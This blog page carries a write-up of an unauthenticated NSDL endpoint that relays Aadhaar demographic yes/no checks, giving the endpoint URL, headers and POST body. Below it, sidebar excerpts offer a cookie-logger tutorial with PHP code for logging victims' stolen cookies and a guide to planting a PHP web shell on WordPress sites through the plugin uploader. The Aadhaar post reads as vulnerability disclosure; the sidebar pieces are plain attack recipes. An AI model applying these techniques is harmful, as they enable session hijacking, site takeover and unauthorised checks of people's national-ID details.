Skip to main content

Loopholes in Aadhaar authentication API services

By

Loopholes in Aadhaar authentication API services

Aadhar Logo


Using this loophole anybody can use Aadhaar demographic authentication API by piggybacking my requests through NSDL servers and bypass the checks at place by UIDAI. 


This story is going to be about how just about anyone can access the API that Aadhaar provides to third party services.

What is Aadhaar?

Aadhaar is the world’s largest biometric ID system, with over 1.19 billion enrolled members as of 30 Nov 2017. As of this date, over 99% of Indians aged 18 and above had been enrolled in Aadhaar.

What is Aadhaar API?

UIDAI (Unique Identification Authority of India) provides different APIs (application programming interface) which can be used to perform various actions like authentication (demographic and biometric), e-KYC (know your customer), e-sign etc.
We are discussing about Aadhaar Authentication API for now.
Going further, you have to know what AUA and SA are
Authentication User Agency (AUA): AUA is an organization or an entity using Aadhaar authentication as part of its applications to provide services to residents. Examples include Government Departments, Banks, and other public or private organizations. All AUAs (Authentication User Agencies) must be registered within Aadhaar authentication server to perform secure authentication.
Sub-AUA (SA): SA is an organization, a department or an entity having a business relationship with AUA offering specific services in a particular domain. All authentication requests emerging from an AUA contains the information on the specific SA. For example, a specific bank providing Aadhaar enabled payment transaction through NPCI as the AUA becomes the SA. Similarly, a state government being an AUA can have the health department under them as the SA using Aadhaar authentication while providing healthcare benefits.

What is Demographic Authentication?

As depicted in Aadhaar API website(which is another AUA) just like Aadhaarbridge.
















The above image explains everything. If you have the Aadhaar number and/or any of the other details like Date of birth, Name, Gender, Address the server will give you a YES if the details match in the Aadhaar database and NO otherwise. Sub-AUA is allowed to do only Yes/No Authentication.
The current list of active AUAs is here. There are 301 active AUAs right now. There is no public list of active Sub-AUAs anywhere.

Who can be a AUA/SUB-AUA?

In order to be an AUA, one has to apply to the UIDAI and must follow certain guidelines. In order to register as a Sub-AUA under any AUA, you need approval from UIDAI, and the AUA will also charge a substantial amount. Which means UIDAI knows which organisations are using Aadhaar services.

The reason for writing the above in detail is to help you understand the problem better.

What is the vulnerability?

Recently the author was applying a PAN card online for his relative where he  noticed that they use Aadhaar authentication services to check if the details we provide are indeed true. Curious, author checked the request that was being sent to verify this. He got shocked seeing how it was implemented.
No doubt UIDAI is taking steps to protect the data. According to them, only registered AUA/SUB-AUA can perform any Aadhaar authentication request. They also track every request that is generated.

How about an insecure SUB-AUA?

The way the authentication is implemented presently in the NSDL(National Securities Depository Limited) website, anybody can just send the following POST request with the necessary details like Aadhaar number, name, date of birth, gender etc. and the server will reply with either a PASSor FAIL. If you notice, there is no need for cookies.
https://www.onlineservices.nsdl.com/paam/verify3.html
Content-Type:application/x-www-form-urlencoded; charset=UTF-8
Accept:*/*
X-Requested-With:XMLHttpRequest
adharNo=************&name=****+****&yob=**%2F**%2F****&gen=*&userId=0000000000&verification=K
The body data in the POST request is as follows.
adharNo=Aadhaar Number&name=Name on card&yob=dd/mm/yyyy&gen=M(or)F&userId=0000000000&verification=K
Look at the screenshots attached below. The first one shows a YES case. In the second image, He has changed the date of birth by one day and the response is a FAIL, which indicates a NO case.

Look at the changed date in the date of birth.


Same Request in Burp Suite which shows a PASS case without the cookies.
Basically, we are piggybacking on their services to make our requests. And since there is no login required, UIDAI thinks that all the requests are originating from NSDL servers.
Which is clearly not the case, as one can make as many requests as  needed for free.
This in fact should have been chargeable by the other AUAs.
The issue here is that the author found this loophole in less than 5 minutes in a SUB-AUA that performs demographic authentication for the general public.
Which means there are plenty more such hidden vulnerabilities present.


The Above awesome post is  written and researched  by 
Sai Krisha Kothapalli : kmskrishna@protonmail.com
You can find his profile here.

Labels:

Comments

Post a Comment

Popular posts from this blog

Assembly Language Step-by-step: Programming with DOS and Linux-

By
(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary
Post a Comment
Read more

Bypass while FTP login during wordpress shell uploads .

By
In this post I will be telling you how to bypass FTP login during wordpress shell upload. Sometimes when we are shelling a Wordpress website by uploading a theme in a zip file, it asks for ftp login information. This can be easily Bypassed using the below Method .  First of all, Log In to your target wordpress website, then in the left side, look for  Plugin option, click on it and select  Add New . There you will see a page titled  Install Plugins,  below it look for the option  Upload  and click on it After clicking on the Upload option, you will get a new page asking you to upload the plugin, browse your.php shell for there and click on Upload After the upload process is completed, you'll get the following Just skip this forum, and you are done xD ! Suppose the name of your shell was code.php, so inorder to access it goto http://www.website.com/wp-content/uploads/code.php
Post a Comment
Read more